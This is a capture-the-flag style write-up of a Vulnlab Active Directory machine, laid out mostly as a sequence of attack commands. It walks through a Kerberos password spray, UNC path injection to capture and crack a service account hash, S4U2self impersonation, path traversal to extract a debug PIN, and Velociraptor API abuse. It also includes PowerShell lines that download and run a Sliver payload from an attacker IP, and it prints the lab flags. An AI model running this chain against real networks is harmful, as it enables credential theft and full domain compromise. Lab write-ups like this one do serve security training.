Malleum Knowledge Base

Report Name

4 min read

Enumeration

sudo nmap -sC -sV -oA 10.10.119.13 -vv 10.10.119.13 -Pn

Nmap Scan Results

Port 21

  • FTP anonymous login
ftp anonymous@10.10.119.13

FTP anonymous access allowed

  • Disable Anonymous Access to the FTP Share.

  • We found some some shares.

Folders that can be accessed anonymously

  • We found list of users in Homes directory

Users found

  • Found a draft file in ITSEC directory

audit_draft.txt file found

  • The file gave us some useful insights.

File Content of audit draft

  • NTLM Authentication is disabled, so we need to use kerberos authentication

  • Signing & Channel binding is enables so will have problems if we need to do any relay attacks

  • Fixed for kerberosating attacks and SeImpersonate

  • The issue regarding the Weak User Passwords is still open. Maybe we could try to do password spray on the users we found on the ftp share.

Port 445

As the NTLM authentication is disabled we need to use kerberos authentication.

  • We made necessay changes to krb5.conf and hosts file.
nxc smb LUS2DC -u 'clean_users.txt' -p 'clean_users.txt' -d lustrous2.vl -k --no-bruteforce
  • We didn’t find any users that has same password as the user name.
  • Let’s Create a password list.
vim wordlist.txt

Spring
Fall
Autumn
Winter
Summer
Lustrous
lustrous

for i in $(cat wordlist.txt);do echo $i;echo ${i}2022;echo ${i}2023;echo ${i}2024;done > t

vim append_exclamation.rule

:
$!
$@

hashcat --force t -r append_exclamation.rule --stdout > hashcat_words.txt

  • We got a different error message for the following user

    Different ms for Thomas.Myers

  • Let’s try to get the TGT for this user

kinit Thomas.Myers

Got TGT for the user

  • We are not able to use the TGT with netexec to access SMB and LDAP.

Port 80

  • We try accessing the website at port 80
  • HTTP kerberos
curl http://lus2dc.lustrous.vl -u:Thomas.Myers --negotiate -I

Firefox kerberos settings

network.negotiate-auth.delegation-uris: lus2dc.lustrous2.vl
network.negotiate-auth.trusted-uris: lus2dc.lustrous2.vl
network.negotiate-auth.using-native-gsslib: true

  • we found audit.txt file which is same as the file we found in ftp share.

Possible LFI

UNC Path Injection

sudo /home/user/.local/bin/smbserver.py share shared -smb2support

curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.2.41\shared\test' -u:Thomas.Myers --negotiate -I

Got the Hash for a Service User

vim hash

hashcat hash /usr/share/wordlists/rockyou.txt

Hash Cracked

Cracked Password

bloodhound-python --zip -c All -d lustrous2.vl -u Thomas.myers@lustrous2.vl -dc lus2dc.lustrous2.vl --auth-method kerberos -ns 10.10.119.13 --use-ldaps

Checking AD groups in BH, we can see that there is a group called “ShareAdmins”. It’s safe to assume that these are the admins of this sharing web application. This group is however a member of the “Protected Users” Group, which means that those users cant “easily” be impersonated when using techniques like Silver Tickets or Delegation.

One technique that allows to bypass this restriction is s4u2self. Using the s4u2self kerberos extension, allows the service user to request a service ticket to itself on behalf of an abitrary principal.

In order to perform the attack, we grab the latest getST.py, get a TGT for the service user and then impersonate one of the share admins, here ryan:

kinit ShareSvc

curl http://lus2dc.lustrous2.vl -u: --negotiate -v

getST.py -self -impersonate "Ryan.Davies" -k -no-pass lustrous2.vl/ShareSvc -altservice HTTP/lus2dc.lustrous2.vl

export KRB5CCNAME=Ryan.Davies@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache

firefox

  • Looking at the source code of Upload page we found a link to debug page.

Hidden Page found

  • Visiting the Website shows us Run Command functionality but to run a command we need a pin. Let use LFI to see if we can get the file from somewhere.
curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=..\..\web.config' -u: --negotiate

A new file found

curl 'http://lus2dc.lustrous2.vl/File/Download?fileName=..\..\LuShare.dll' -u: --negotiate --output LuShare.dll
  • Open the Dll in CodemerxDecompile
/opt/tools/CodemerxDecompile/CodemerxDecompile

Pin Found

ba45c518
  • We again go to the debug functionality and upload our sliver payload. Check it in retro2 machine.
iwr http://10.8.2.41/sharp.ps1 -OutFile sharp2.ps1

powershell ./sharp2.ps1

got a callback

VL{636d8f0a348196f1c939d33bedc5e0e8}

Velociraptor Privilege Escalation

  • First check if the server.config.yaml in server folder has private key. If yes then
./velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator C:\Temp\api.config.yaml
  • We created the config file now let’s check the permission
./velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml acl show admin
  • Let’s see if we can run normal queries
./velociraptor-v0.72.4-windows-amd64.exe --api_config C:\Temp\api.config.yaml query "SELECT * FROM info()"
  • Let’s run the powershell commands to get the shell
./velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['Powershell','-ExecutionPolicy','unrestriced','-c','iwr http://10.8.2.41/sharp.ps1 -OutFile C:\Temp\sharp.ps1'])"

./velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['Powershell','-ExecutionPolicy','bypass','-c','C:\Temp\sharp.ps1'])"


VL{948164bdc2e92cc1eeb5699bbde09fa1}


[https://api.vulnlab.com/api/v1/share?id=a90d6534-c1e7-4313-af86-f3d8cdc92e47](https://api.vulnlab.com/api/v1/share?id=a90d6534-c1e7-4313-af86-f3d8cdc92e47 "https://api.vulnlab.com/api/v1/share?id=a90d6534-c1e7-4313-af86-f3d8cdc92e47")

Graph View